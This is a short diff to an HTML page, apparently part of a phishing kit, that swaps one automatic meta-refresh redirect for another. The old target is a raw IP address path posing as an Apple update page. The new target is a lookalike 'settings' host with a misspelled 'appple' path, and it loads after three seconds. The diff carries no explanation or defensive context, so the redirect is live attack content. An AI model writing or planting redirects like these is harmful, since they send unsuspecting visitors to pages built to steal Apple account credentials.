--- a/app.htm
+++ b/app.htm
@@ -35,5 +35,5 @@
 </div>
 
 
-<meta http-equiv="refresh" content="4;url=http://207.210.200.146/~goontone/apple/update.php">
+<meta http-equiv="refresh" content="3;url=http://settings.acsite.org/user/appple/1.php">
 </body></html>
